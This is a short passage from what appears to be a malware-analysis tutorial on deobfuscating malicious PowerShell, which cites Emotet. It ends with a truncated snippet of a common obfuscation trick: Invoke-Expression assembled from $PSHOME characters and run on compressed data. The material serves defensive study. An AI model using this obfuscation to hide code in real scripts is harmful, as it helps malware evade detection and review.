Deobfuscating malicious PowerShell scripts
Perhaps one of the most common scripting languages in use for both malicious and legitimate administration purposes is the built-in Windows scripting engine based on .NET—PowerShell.
PowerShell has been embraced readily by threat actors, red teamers, and systems administrators alike to accomplish their ends due to its power.
As a result of this power, it's also incredibly easy to obfuscate PowerShell scripts in many different ways. We'll take a look at a few examples exclusive to PowerShell, and a real-world example utilized by Emotet!
First, we'll take a look at a few examples that are utilized by PowerShell that are generally unique to PowerShell malware samples.
Compression
The first method (which is one of the most commonly utilized obfuscation methods) is compression, as shown in the following code snippet:
.($pshOme[21]+$PsHomE[30]+'X') (NEw-obJECt iO.STREAmREAdER ( ( NEw...